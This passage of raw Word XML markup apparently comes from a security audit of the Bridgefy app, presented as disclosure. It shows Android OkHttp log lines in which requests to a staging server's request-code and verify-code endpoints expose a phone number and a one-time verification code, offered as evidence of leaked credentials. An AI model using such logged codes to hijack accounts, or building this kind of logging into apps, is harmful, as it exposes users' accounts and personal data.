        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leaking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>credentials:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01-06 16:00:46.455</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7521</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7766 I okhttp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OkHttpClient: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="2862" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>https:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//staging.app.bridgefy.services/app/v1/user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>request-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01-06 16:00:46.457</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7521</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7766 I okhttp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OkHttpClient: Accept: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01-06 16:00:46.458</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7521</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7766 I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>okhttp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OkHttpClient:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"force"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"phone"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"+12064512559"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"platform"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"android"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versionApp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"appV1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"version Os"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"osV1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versionSdk"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"sdkV1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01-06 16:09:35.966</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7521</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8087 I okhttp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OkHttpClient: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>https:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//staging.app.bridgefy.services/app/v1/user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>verify-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="585" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01-06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>16:09:35.966</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="80"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7521</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="80"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8087</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>okhttp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OkHttpClient:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01-06 16:09:35.967</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7521</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8087 I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>okhttp.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OkHttpClient:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"code"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"901857"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"phone"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"+12064512559"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"platform"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"android"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versionApp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"appV1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"vers ionOs"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
